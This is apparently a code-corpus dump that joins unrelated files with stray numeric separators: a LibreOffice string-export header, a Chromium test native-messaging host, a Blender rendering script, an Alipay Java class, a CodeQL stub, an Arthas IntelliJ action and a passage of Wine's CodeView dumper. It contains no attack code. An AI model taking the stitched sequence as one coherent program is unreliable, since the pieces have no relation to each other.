formatting runs. */ inline const XclFormatRunVec& GetFormats() const { return maFormats; } /** Returns the current string flags field to export. */ sal_uInt8 GetFlagField() const; /** Returns the byte count the header will take on export. */ sal_uInt16 GetHeaderSize() const; /** Returns the byte count the character buffer will take on export. */ sal_Size GetBufferSize() const; /** Returns the byte count the whole string will take on export. */ sal_Size GetSize() const; /** Returns the specified character from the (already encoded) string. */ sal_uInt16 GetChar( sal_uInt16 nCharIdx ) const; /** Returns a hash value for the string. */ sal_uInt16 GetHash() const; const ScfUInt16Vec& GetUnicodeBuffer() const { return maUniBuffer; } // streaming -------------------------------------------------------------- /** Writes the string length field (1 byte or 2 bytes). */ void WriteLenField( XclExpStream& rStrm ) const; /** Writes the string flags field (1 byte). */ void WriteFlagField( XclExpStream& rStrm ) const; /** Writes 8-bit or 16-bit length field and string flags field. */ void WriteHeader( XclExpStream& rStrm ) const; /** Writes the raw character buffer. 
*/ void WriteBuffer( XclExpStream& rStrm ) const; /** Writes the raw formatting run buffer. */ void WriteFormats( XclExpStream& rStrm, bool bWriteSize = false ) const; /** Writes the complete Unicode string. */ void Write( XclExpStream& rStrm ) const; /** Writes the string header to memory. */ void WriteHeaderToMem( sal_uInt8* pnMem ) const; /** Writes the raw character buffer to memory (8-bit or 16-bit little-endian). */ void WriteBufferToMem( sal_uInt8* pnMem ) const; /** Writes the entire string to memory. */ void WriteToMem( sal_uInt8* pnMem ) const; void WriteXml( XclExpXmlStream& rStrm ) const; // ------------------------------------------------------------------------ private: /** Returns true, if the flag field should be written. */ bool IsWriteFlags() const; /** Returns true, if the formatting run vector should be written. */ bool IsWriteFormats() const; /** Sets the string length but regards the limit given in mnMaxLen. */ void SetStrLen( sal_Int32 nNewLen ); /** Inserts the passed character array into the internal character buffer. @param nBegin First index in internal buffer to fill. @param nLen Number of characters to insert. */ void CharsToBuffer( const sal_Unicode* pcSource, sal_Int32 nBegin, sal_Int32 nLen ); /** Inserts the passed character array into the internal character buffer. @param nBegin First index in internal buffer to fill. @param nLen Number of characters to insert. */ void CharsToBuffer( const sal_Char* pcSource, sal_Int32 nBegin, sal_Int32 nLen ); /** Initializes flags, string length, and resizes character buffer. @param nFlags Modifiers for string export. @param nCurrLen The requested number of characters for the string. @param nMaxLen The maximum length allowed of the resulting string. @param bBiff8 true = BIFF8 Unicode string; false = BIFF2-BIFF7 byte string. */ void Init( sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen, bool bBiff8 ); /** Creates the character buffer from the given Unicode array. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nFlags Modifiers for string export. @param nCurrLen The real count of characters contained in the passed buffer. @param nMaxLen The maximum length allowed of the resulting string. */ void Build( const sal_Unicode* pcSource, sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen ); /** Creates the character buffer from the given character array. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nFlags Modifiers for string export. @param nCurrLen The real count of characters contained in the passed buffer. @param nMaxLen The maximum length allowed of the resulting string. */ void Build( const sal_Char* pcSource, sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen ); /** Initializes string length and resizes character buffers for appending operation. @param nAddLen The number of characters to be appended. */ void InitAppend( sal_Int32 nAddLen ); /** Appends the given Unicode array to the character buffer. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nAddLen The real count of characters contained in the passed buffer. */ void BuildAppend( const sal_Unicode* pcSource, sal_Int32 nAddLen ); /** Appends the given character array to the character buffer. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nAddLen The real count of characters contained in the passed buffer. 
*/ void BuildAppend( const sal_Char* pcSource, sal_Int32 nAddLen ); /** Initializes write process on stream. */ void PrepareWrite( XclExpStream& rStrm, sal_uInt16 nBytes ) const; private: ScfUInt16Vec maUniBuffer; /// The Unicode character buffer. ScfUInt8Vec maCharBuffer; /// The byte character buffer. XclFormatRunVec maFormats; /// All formatting runs. sal_uInt16 mnLen; /// Character count to export. sal_uInt16 mnMaxLen; /// Maximum allowed number of characters. bool mbIsBiff8; /// true = BIFF8 Unicode string, false = BIFF2-7 bytestring. bool mbIsUnicode; /// true, if at least one character is >0xFF. bool mb8BitLen; /// true = write 8-bit string length; false = 16-bit. bool mbSmartFlags; /// true = omit flags on empty string; false = always write flags. bool mbSkipFormats; /// true = skip formats on export; false = write complete formatted string. bool mbWrapped; /// true = text contains several paragraphs. bool mbSkipHeader; /// true = skip length and flags when writing string bytes. }; inline bool operator==( const XclExpString& rLeft, const XclExpString& rRight ) { return rLeft.IsEqual( rRight ); } inline bool operator!=( const XclExpString& rLeft, const XclExpString& rRight ) { return !(rLeft == rRight); } inline bool operator<( const XclExpString& rLeft, const XclExpString& rRight ) { return rLeft.IsLessThan( rRight ); } inline XclExpStream& operator<<( XclExpStream& rStrm, const XclExpString& rString ) { rString.Write( rStrm ); return rStrm; } // ============================================================================ #endif
7,458
14,668
<filename>chrome/test/data/native_messaging/native_hosts/empty_app.py #!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This native client will read full messages, but do nothing with them and # send no responses. import sys import struct while 1: # Read the message type (first 4 bytes). typeBytes = sys.stdin.read(4) if len(typeBytes) == 0: break # Read the message length (4 bytes). textLength = struct.unpack('i', sys.stdin.read(4))[0] # Read the text (JSON object) of the message. text = sys.stdin.read(textLength)
218
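For context, the framing that the empty native host above expects on stdin can be read straight off its loop: a 4-byte type field, a 4-byte length field unpacked with struct format 'i', and then that many bytes of JSON text. The sketch below feeds one such message to the host and closes the pipe so the loop ends on EOF; the interpreter name, the script path, the type value 1, and the payload are illustrative assumptions, not part of the Chromium test.

# Sketch only: drive empty_app.py with one framed message.
# Assumptions: "python" resolves to an interpreter that can run the host,
# the script sits in the current directory, and the 4-byte type value is
# arbitrary because the host discards everything it reads.
import json
import struct
import subprocess

payload = json.dumps({"ping": True}).encode("utf-8")

proc = subprocess.Popen(["python", "empty_app.py"], stdin=subprocess.PIPE)
proc.stdin.write(struct.pack("i", 1))             # 4-byte "type" field
proc.stdin.write(struct.pack("i", len(payload)))  # 4-byte length field
proc.stdin.write(payload)                         # JSON text of the message
proc.stdin.close()                                # EOF ends the host's read loop
proc.wait()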
383
import os from os.path import join, realpath, exists import pandas as pd import numpy as np from tqdm import tqdm import json import argparse import sys sys.path.append('../..') from blender_render.render_random_pose import RenderMachine parser = argparse.ArgumentParser() parser.add_argument('--dataset_dir', type=str, help='dataset directory') parser.add_argument('--input', type=str, help='subdirectory containing obj files in the dataset directory') parser.add_argument('--output', type=str, help='subdirectory to save the generated data in the dataset directory') parser.add_argument('--csv', type=str, help='csv file containing dataset information') parser.add_argument('--bg_dir', type=str, default='/home/xiao/Datasets/PascalVOC/VOCdevkit/VOC2012/Images/JPEGImages', help='directory containing the background images') parser.add_argument('--images_per_scene', type=int, default=100, help='images generated for each scene') parser.add_argument('--scenes', type=int, default=100, help='number of scenes to generate') args = parser.parse_args() # set related directories model_dir = join(args.dataset_dir, args.input) out_dir = join(args.dataset_dir, args.output) root_dir = realpath('../..') texture_dir = join(root_dir, 'blender_render', 'textures') table_file = join(root_dir, 'blender_render', 'Platte.obj') table_poses = np.load(join(root_dir, 'blender_render', 'table_poses.npz')) R, T, Ele = table_poses['R'], table_poses['T'], table_poses['Ele'] # read dataset statistics and select the appropriate models df = pd.read_csv(join(args.dataset_dir, args.csv)) df = df[df.file_size <= 10] df = df[df.ratio_max <= 5] df = df[df.ratio_min >= 0.2] df = df[df.occupy_min >= 0.1] # create the final csv file containing all the annotations outfile = join(args.dataset_dir, '{}.txt'.format(args.output)) frames = [] for scene_id in range(args.scenes): scene_out = join(out_dir, '{:06d}'.format(scene_id)) scene_file = join(scene_out, 'scene_gt.json') if not exists(scene_file): # Create one render machine for each scene model_idx = np.random.randint(0, len(df), size=(np.random.randint(5, 25),)) model_files = [join(model_dir, '{}.obj'.format(df.iloc[i, 0])) for i in model_idx] render_machine = RenderMachine(model_files, scene_out, table_file=table_file, texture_dir=texture_dir, bg_dir=args.bg_dir, rad=3000) scene_annot = {} pose_idx = np.random.randint(0, R.shape[0], size=(args.images_per_scene,)) for i in range(args.images_per_scene): start_idx = len(scene_annot) render_machine.render_random_pose(scene_annot, start_idx, scene_id, i, R[pose_idx[i], :], T[pose_idx[i], :], Ele[pose_idx[i]]) with open(scene_file, 'w') as f: json.dump(scene_annot, f, indent=4) scene_df = pd.read_json(scene_file, orient='index') frames.append(scene_df) result = pd.concat(frames) result.to_csv(outfile)
1,162
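To sanity-check a run of the generation script above, the files it writes can be loaded back with pandas and json: the combined annotation table goes to <dataset_dir>/<output>.txt via to_csv, and each scene keeps its own scene_gt.json. The snippet below is only a sketch; dataset_dir and output are placeholders standing in for whatever --dataset_dir and --output were passed on the command line.

# Sketch: inspect the annotations produced by the generation script.
# Assumptions: dataset_dir/output mirror the --dataset_dir/--output
# arguments of the run being checked.
import json
from os.path import join

import pandas as pd

dataset_dir = "/path/to/dataset"  # placeholder
output = "renders"                # placeholder

# Combined per-frame annotations, written by result.to_csv(outfile).
combined = pd.read_csv(join(dataset_dir, "{}.txt".format(output)))
print(combined.shape)

# Ground truth for scene 0, written by json.dump(scene_annot, f, indent=4).
with open(join(dataset_dir, output, "{:06d}".format(0), "scene_gt.json")) as f:
    scene_annot = json.load(f)
print(len(scene_annot))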
333
package com.alipay.api.domain; import com.alipay.api.AlipayObject; import com.alipay.api.internal.mapping.ApiField; /** * Consumption reward information list * * @author auto create * @since 1.0, 2016-11-24 22:26:22 */ public class ConsumeInfo extends AlipayObject { private static final long serialVersionUID = 7615267943956617366L; /** * Time the voucher was claimed */ @ApiField("taken_time") private String takenTime; /** * User name */ @ApiField("user_name") private String userName; /** * Face value (in cents) */ @ApiField("voucher_amt") private String voucherAmt; public String getTakenTime() { return this.takenTime; } public void setTakenTime(String takenTime) { this.takenTime = takenTime; } public String getUserName() { return this.userName; } public void setUserName(String userName) { this.userName = userName; } public String getVoucherAmt() { return this.voucherAmt; } public void setVoucherAmt(String voucherAmt) { this.voucherAmt = voucherAmt; } }
475
4,036
<filename>java/ql/test/stubs/apache-commons-collections4-4.4/org/apache/commons/collections4/MultiSet.java // Generated automatically from org.apache.commons.collections4.MultiSet for testing purposes package org.apache.commons.collections4; import java.util.Collection; import java.util.Iterator; import java.util.Set; public interface MultiSet<E> extends Collection<E> { Iterator<E> iterator(); Set<E> uniqueSet(); Set<MultiSet.Entry<E>> entrySet(); boolean add(E p0); boolean containsAll(Collection<? extends Object> p0); boolean equals(Object p0); boolean remove(Object p0); boolean removeAll(Collection<? extends Object> p0); boolean retainAll(Collection<? extends Object> p0); int add(E p0, int p1); int getCount(Object p0); int hashCode(); int remove(Object p0, int p1); int setCount(E p0, int p1); int size(); static public interface Entry<E> { E getElement(); boolean equals(Object p0); int getCount(); int hashCode(); } }
384
364
package com.github.wangji92.arthas.plugin.action.arthas; import com.github.wangji92.arthas.plugin.utils.ClipboardUtils; import com.github.wangji92.arthas.plugin.utils.NotifyUtils; import com.intellij.openapi.actionSystem.AnAction; import com.intellij.openapi.actionSystem.AnActionEvent; import com.intellij.openapi.actionSystem.CommonDataKeys; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.project.Project; import org.jetbrains.annotations.NotNull; /** * classloader command usage * <p> * classloader -t print the classloader inheritance tree * classloader -l list statistics by classloader instance * classloader -c 327a647b show the actual urls of that URLClassLoader * classloader -c 327a647b -r java/lang/String.class look up a resource with that ClassLoader * classloader -a show all loaded classes * classloader -a -c 327a647b show the classes loaded by that classloader * classloader -c 659e0bfd --load demo.MathGame load a class with that classloader * * @author 汪小哥 * @date 20-06-2020 */ public class ArthasClassloaderCommandAction extends AnAction { @Override public void actionPerformed(@NotNull AnActionEvent event) { DataContext dataContext = event.getDataContext(); Project project = CommonDataKeys.PROJECT.getData(dataContext); if (project == null) { return; } ClipboardUtils.setClipboardString("classloader -l"); NotifyUtils.notifyMessageDefault(project); } }
595
686
/* * MS debug info dumping utility * * Copyright 2006 <NAME> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA */ #include "config.h" #include "wine/port.h" #include <stdlib.h> #include <stdarg.h> #include <stdio.h> #ifdef HAVE_UNISTD_H # include <unistd.h> #endif #include <time.h> #ifdef HAVE_SYS_TYPES_H # include <sys/types.h> #endif #ifdef HAVE_SYS_STAT_H # include <sys/stat.h> #endif #ifdef HAVE_SYS_MMAN_H #include <sys/mman.h> #endif #include <fcntl.h> #include "windef.h" #include "winbase.h" #include "winedump.h" #include "wine/mscvpdb.h" #define PSTRING(adr, ofs) \ ((const struct p_string*)((const char*)(adr) + (ofs))) static const char* p_string(const struct p_string* s) { static char tmp[256 + 1]; memcpy(tmp, s->name, s->namelen); tmp[s->namelen] = '\0'; return tmp; } struct full_value { enum {fv_integer, fv_longlong} type; union { int i; long long unsigned llu; } v; }; static int full_numeric_leaf(struct full_value* fv, const unsigned short int* leaf) { unsigned short int type = *leaf++; int length = 2; fv->type = fv_integer; if (type < LF_NUMERIC) { fv->v.i = type; } else { switch (type) { case LF_CHAR: length += 1; fv->v.i = *(const char*)leaf; break; case LF_SHORT: length += 2; fv->v.i = *(const short*)leaf; break; case LF_USHORT: length += 2; fv->v.i = *leaf; break; case LF_LONG: length += 4; fv->v.i = *(const int*)leaf; break; case LF_ULONG: length += 4; fv->v.i = *(const unsigned int*)leaf; break; case LF_QUADWORD: length += 8; fv->type = fv_longlong; fv->v.llu = *(const long long int*)leaf; break; case LF_UQUADWORD: length += 8; fv->type = fv_longlong; fv->v.llu = *(const long long unsigned int*)leaf; break; case LF_REAL32: length += 4; printf(">>> unsupported leaf value %04x\n", type); fv->v.i = 0; /* FIXME */ break; case LF_REAL48: length += 6; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL64: length += 8; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL80: length += 10; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL128: length += 16; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX32: length += 4; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX64: length += 8; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX80: length += 10; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX128: length += 16; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_VARSTRING: length += 2 + *leaf; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; default: printf(">>> Unsupported numeric leaf-id %04x\n", type); fv->v.i = 0; 
break; } } return length; } static const char* full_value_string(const struct full_value* fv) { static char tmp[128]; switch (fv->type) { case fv_integer: sprintf(tmp, "0x%x", fv->v.i); break; case fv_longlong: sprintf(tmp, "0x%x%08x", (unsigned)(fv->v.llu >> 32), (unsigned)fv->v.llu); break; } return tmp; } static int numeric_leaf(int* value, const unsigned short int* leaf) { struct full_value fv; int len = full_numeric_leaf(&fv, leaf); switch (fv.type) { case fv_integer: *value = fv.v.i; break; case fv_longlong: *value = (unsigned)fv.v.llu; printf("bad conversion\n"); break; default: assert( 0 ); *value = 0; } return len; } static const char* get_attr(unsigned attr) { static char tmp[256]; switch (attr & 3) { case 0: strcpy(tmp, ""); break; case 1: strcpy(tmp, "private "); break; case 2: strcpy(tmp, "protected "); break; case 3: strcpy(tmp, "public "); break; } switch ((attr >> 2) & 7) { case 0: strcat(tmp, ""); break; case 1: strcat(tmp, "virtual "); break; case 2: strcat(tmp, "static "); break; case 3: strcat(tmp, "friend "); break; case 4: strcat(tmp, "introducing virtual "); break; case 5: strcat(tmp, "pure virtual "); break; case 6: strcat(tmp, "pure introducing virtual "); break; case 7: strcat(tmp, "reserved "); break; } if ((attr >> 5) & 1) strcat(tmp, "pseudo "); if ((attr >> 6) & 1) strcat(tmp, "no-inherit "); if ((attr >> 7) & 1) strcat(tmp, "no-construct "); return tmp; } static const char* get_property(unsigned prop) { static char tmp[1024]; unsigned pos = 0; if (!prop) return "none"; #define X(s) {if (pos) tmp[pos++] = ';'; strcpy(tmp + pos, s); pos += strlen(s);} if (prop & 0x0001) X("packed"); if (prop & 0x0002) X("w/{cd}tor"); if (prop & 0x0004) X("w/overloaded-ops"); if (prop & 0x0008) X("nested-class"); if (prop & 0x0010) X("has-nested-classes"); if (prop & 0x0020) X("w/overloaded-assign"); if (prop & 0x0040) X("w/casting-methods"); if (prop & 0x0080) X("forward"); if (prop & 0x0100) X("scoped"); #undef X if (prop & ~0x01FF) pos += sprintf(tmp, "unk%x", prop & ~0x01FF); else tmp[pos] = '\0'; assert(pos < sizeof(tmp)); return tmp; } static void do_field(const unsigned char* start, const unsigned char* end) { /* * A 'field list' is a CodeView-specific data type which doesn't * directly correspond to any high-level data type. It is used * to hold the collection of members of a struct, class, union * or enum type. The actual definition of that type will follow * later, and refer to the field list definition record. * * As we don't have a field list type ourselves, we look ahead * in the field list to try to find out whether this field list * will be used for an enum or struct type, and create a dummy * type of the corresponding sort. Later on, the definition of * the 'real' type will copy the member / enumeration data. */ const unsigned char* ptr = start; const char* cstr; const struct p_string* pstr; int leaf_len, value; while (ptr < end) { const union codeview_fieldtype* fieldtype = (const union codeview_fieldtype*)ptr; if (*ptr >= 0xf0) /* LF_PAD... 
*/ { ptr +=* ptr & 0x0f; continue; } switch (fieldtype->generic.id) { case LF_ENUMERATE_V1: leaf_len = numeric_leaf(&value, &fieldtype->enumerate_v1.value); pstr = PSTRING(&fieldtype->enumerate_v1.value, leaf_len); printf("\t\tEnumerate V1: '%s' value:%d\n", p_string(pstr), value); ptr += 2 + 2 + leaf_len + 1 + pstr->namelen; break; case LF_ENUMERATE_V3: leaf_len = numeric_leaf(&value, &fieldtype->enumerate_v3.value); cstr = (const char*)&fieldtype->enumerate_v3.value + leaf_len; printf("\t\tEnumerate V3: '%s' value:%d\n", cstr, value); ptr += 2 + 2 + leaf_len + strlen(cstr) + 1; break; case LF_MEMBER_V1: leaf_len = numeric_leaf(&value, &fieldtype->member_v1.offset); pstr = PSTRING(&fieldtype->member_v1.offset, leaf_len); printf("\t\tMember V1: '%s' type:%x attr:%s @%d\n", p_string(pstr), fieldtype->member_v1.type, get_attr(fieldtype->member_v1.attribute), value); ptr += 2 + 2 + 2 + leaf_len + 1 + pstr->namelen; break; case LF_MEMBER_V2: leaf_len = numeric_leaf(&value, &fieldtype->member_v2.offset); pstr = PSTRING(&fieldtype->member_v2.offset, leaf_len); printf("\t\tMember V2: '%s' type:%x attr:%s @%d\n", p_string(pstr), fieldtype->member_v2.type, get_attr(fieldtype->member_v2.attribute), value); ptr += 2 + 2 + 4 + leaf_len + 1 + pstr->namelen; break; case LF_MEMBER_V3: leaf_len = numeric_leaf(&value, &fieldtype->member_v3.offset); cstr = (const char*)&fieldtype->member_v3.offset + leaf_len; printf("\t\tMember V3: '%s' type:%x attr:%s @%d\n", cstr, fieldtype->member_v3.type, get_attr(fieldtype->member_v3.attribute), value); ptr += 2 + 2 + 4 + leaf_len + strlen(cstr) + 1; break; case LF_ONEMETHOD_V1: switch ((fieldtype->onemethod_v1.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V1: '%s' attr:%s type:%x vtable_offset:%u\n", p_string(&fieldtype->onemethod_virt_v1.p_name), get_attr(fieldtype->onemethod_virt_v1.attribute), fieldtype->onemethod_virt_v1.type, fieldtype->onemethod_virt_v1.vtab_offset); ptr += 2 + 2 + 2 + 4 + (1 + fieldtype->onemethod_virt_v1.p_name.namelen); break; default: printf("\t\tMethod V1: '%s' attr:%s type:%x\n", p_string(&fieldtype->onemethod_v1.p_name), get_attr(fieldtype->onemethod_v1.attribute), fieldtype->onemethod_v1.type); ptr += 2 + 2 + 2 + (1 + fieldtype->onemethod_v1.p_name.namelen); break; } break; case LF_ONEMETHOD_V2: switch ((fieldtype->onemethod_v2.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V2: '%s' attr:%s type:%x vtable_offset:%u\n", p_string(&fieldtype->onemethod_virt_v2.p_name), get_attr(fieldtype->onemethod_virt_v2.attribute), fieldtype->onemethod_virt_v2.type, fieldtype->onemethod_virt_v2.vtab_offset); ptr += 2 + 2 + 4 + 4 + (1 + fieldtype->onemethod_virt_v2.p_name.namelen); break; default: printf("\t\tMethod V2: '%s' attr:%s type:%x\n", p_string(&fieldtype->onemethod_v2.p_name), get_attr(fieldtype->onemethod_v2.attribute), fieldtype->onemethod_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->onemethod_v2.p_name.namelen); break; } break; case LF_ONEMETHOD_V3: switch ((fieldtype->onemethod_v3.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V3: '%s' attr:%s type:%x vtable_offset:%u\n", fieldtype->onemethod_virt_v3.name, get_attr(fieldtype->onemethod_virt_v3.attribute), fieldtype->onemethod_virt_v3.type, fieldtype->onemethod_virt_v3.vtab_offset); ptr += 2 + 2 + 4 + 4 + (strlen(fieldtype->onemethod_virt_v3.name) + 1); break; default: printf("\t\tMethod V3: '%s' attr:%s type:%x\n", fieldtype->onemethod_v3.name, get_attr(fieldtype->onemethod_v3.attribute), fieldtype->onemethod_v3.type); ptr += 2 + 2 + 
4 + (strlen(fieldtype->onemethod_v3.name) + 1); break; } break; case LF_METHOD_V1: printf("\t\tMethod V1: '%s' overloaded=#%d method-list=%x\n", p_string(&fieldtype->method_v1.p_name), fieldtype->method_v1.count, fieldtype->method_v1.mlist); ptr += 2 + 2 + 2 + (1 + fieldtype->method_v1.p_name.namelen); break; case LF_METHOD_V2: printf("\t\tMethod V2: '%s' overloaded=#%d method-list=%x\n", p_string(&fieldtype->method_v2.p_name), fieldtype->method_v2.count, fieldtype->method_v2.mlist); ptr += 2 + 2 + 4 + (1 + fieldtype->method_v2.p_name.namelen); break; case LF_METHOD_V3: printf("\t\tMethod V3: '%s' overloaded=#%d method-list=%x\n", fieldtype->method_v3.name, fieldtype->method_v3.count, fieldtype->method_v3.mlist); ptr += 2 + 2 + 4 + (strlen(fieldtype->method_v3.name) + 1); break; case LF_STMEMBER_V1: printf("\t\tStatic member V1: '%s' attr:%s type:%x\n", p_string(&fieldtype->stmember_v1.p_name), get_attr(fieldtype->stmember_v1.attribute), fieldtype->stmember_v1.type); ptr += 2 + 2 + 2 + (1 + fieldtype->stmember_v1.p_name.namelen); break; case LF_STMEMBER_V2: printf("\t\tStatic member V2: '%s' attr:%s type:%x\n", p_string(&fieldtype->stmember_v2.p_name), get_attr(fieldtype->stmember_v2.attribute), fieldtype->stmember_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->stmember_v2.p_name.namelen); break; case LF_STMEMBER_V3: printf("\t\tStatic member V3: '%s' attr:%s type:%x\n", fieldtype->stmember_v3.name, get_attr(fieldtype->stmember_v3.attribute), fieldtype->stmember_v3.type); ptr += 2 + 2 + 4 + (strlen(fieldtype->stmember_v3.name) + 1); break; case LF_FRIENDFCN_V1: printf("\t\tFriend function V1: '%s' type:%x\n", p_string(&fieldtype->friendfcn_v1.p_name), fieldtype->friendfcn_v1.type); break; case LF_FRIENDFCN_V2: printf("\t\tFriend function V2: '%s' type:%x\n", p_string(&fieldtype->friendfcn_v2.p_name), fieldtype->friendfcn_v2.type); break; #if 0 case LF_FRIENDFCN_V3: printf("\t\tFriend function V3: '%s' type:%x\n", fieldtype->friendfcn_v3.name, fieldtype->friendfcn_v3.type); break; #endif case LF_BCLASS_V1: leaf_len = numeric_leaf(&value, &fieldtype->bclass_v1.offset); printf("\t\tBase class V1: type:%x attr:%s @%d\n", fieldtype->bclass_v1.type, get_attr(fieldtype->bclass_v1.attribute), value); ptr += 2 + 2 + 2 + leaf_len; break; case LF_BCLASS_V2: leaf_len = numeric_leaf(&value, &fieldtype->bclass_v2.offset); printf("\t\tBase class V2: type:%x attr:%s @%d\n", fieldtype->bclass_v2.type, get_attr(fieldtype->bclass_v2.attribute), value); ptr += 2 + 2 + 4 + leaf_len; break; case LF_VBCLASS_V1: case LF_IVBCLASS_V1: leaf_len = numeric_leaf(&value, &fieldtype->vbclass_v1.vbpoff); printf("\t\t%sirtual base class V1: type:%x (ptr:%x) attr:%s vbpoff:%d ", (fieldtype->generic.id == LF_VBCLASS_V2) ? "V" : "Indirect v", fieldtype->vbclass_v1.btype, fieldtype->vbclass_v1.vbtype, get_attr(fieldtype->vbclass_v1.attribute), value); ptr += 2 + 2 + 2 + 2 + leaf_len; leaf_len = numeric_leaf(&value, (const unsigned short*)ptr); printf("vboff:%d\n", value); ptr += leaf_len; break; case LF_VBCLASS_V2: case LF_IVBCLASS_V2: leaf_len = numeric_leaf(&value, &fieldtype->vbclass_v1.vbpoff); printf("\t\t%sirtual base class V2: type:%x (ptr:%x) attr:%s vbpoff:%d ", (fieldtype->generic.id == LF_VBCLASS_V2) ? 
"V" : "Indirect v", fieldtype->vbclass_v2.btype, fieldtype->vbclass_v2.vbtype, get_attr(fieldtype->vbclass_v2.attribute), value); ptr += 2 + 2 + 4 + 4 + leaf_len; leaf_len = numeric_leaf(&value, (const unsigned short*)ptr); printf("vboff:%d\n", value); ptr += leaf_len; break; case LF_FRIENDCLS_V1: printf("\t\tFriend class V1: type:%x\n", fieldtype->friendcls_v1.type); break; case LF_FRIENDCLS_V2: printf("\t\tFriend class V2: type:%x\n", fieldtype->friendcls_v2.type); break; case LF_NESTTYPE_V1: printf("\t\tNested type V1: '%s' type:%x\n", p_string(&fieldtype->nesttype_v1.p_name), fieldtype->nesttype_v1.type); ptr += 2 + 2 + (1 + fieldtype->nesttype_v1.p_name.namelen); break; case LF_NESTTYPE_V2: printf("\t\tNested type V2: '%s' pad0:%u type:%x\n", p_string(&fieldtype->nesttype_v2.p_name), fieldtype->nesttype_v2._pad0, fieldtype->nesttype_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->nesttype_v2.p_name.namelen); break; case LF_NESTTYPE_V3: printf("\t\tNested type V3: '%s' pad0:%u type:%x\n", fieldtype->nesttype_v3.name, fieldtype->nesttype_v3._pad0, fieldtype->nesttype_v3.type); ptr += 2 + 2 + 4 + (strlen(fieldtype->nesttype_v3.name) + 1); break; case LF_VFUNCTAB_V1: printf("\t\tVirtual function table V1: type:%x\n", fieldtype->vfunctab_v1.type); ptr += 2 + 2; break; case LF_VFUNCTAB_V2: printf("\t\tVirtual function table V2: type:%x\n", fieldtype->vfunctab_v2.type); ptr += 2 + 2 + 4; break; case LF_VFUNCOFF_V1: printf("\t\tVirtual function table offset V1: type:%x offset:%x\n", fieldtype->vfuncoff_v1.type, fieldtype->vfuncoff_v1.offset); break; case LF_VFUNCOFF_V2: printf("\t\tVirtual function table offset V2: type:%x offset:%x\n", fieldtype->vfuncoff_v2.type, fieldtype->vfuncoff_v2.offset); break; default: printf(">>> Unsupported field-id %x\n", fieldtype->generic.id); dump_data((const void*)fieldtype, 0x30, "\t"); break; } } } static void codeview_dump_one_type(unsigned curr_type, const union codeview_type* type) { const union codeview_reftype* reftype = (const union codeview_reftype*)type; int i, leaf_len, value; unsigned int j; const char* str; switch (type->generic.id) { case LF_POINTER_V1: printf("\t%x => Pointer V1 to type:%x\n", curr_type, type->pointer_v1.datatype); break; case LF_POINTER_V2: printf("\t%x => Pointer V2 to type:%x\n", curr_type, type->pointer_v2.datatype); break; case LF_ARRAY_V1: leaf_len = numeric_leaf(&value, &type->array_v1.arrlen); printf("\t%x => Array V1-'%s'[%u type:%x] type:%x\n", curr_type, p_string(PSTRING(&type->array_v1.arrlen, leaf_len)), value, type->array_v1.idxtype, type->array_v1.elemtype); break; case LF_ARRAY_V2: leaf_len = numeric_leaf(&value, &type->array_v2.arrlen); printf("\t%x => Array V2-'%s'[%u type:%x] type:%x\n", curr_type, p_string(PSTRING(&type->array_v2.arrlen, leaf_len)), value, type->array_v2.idxtype, type->array_v2.elemtype); break; case LF_ARRAY_V3: leaf_len = numeric_leaf(&value, &type->array_v3.arrlen); str = (const char*)&type->array_v3.arrlen + leaf_len; printf("\t%x => Array V3-'%s'[%u type:%x] type:%x\n", curr_type, str, value, type->array_v3.idxtype, type->array_v3.elemtype); break; /* a bitfields is a CodeView specific data type which represent a bitfield * in a structure or a class. 
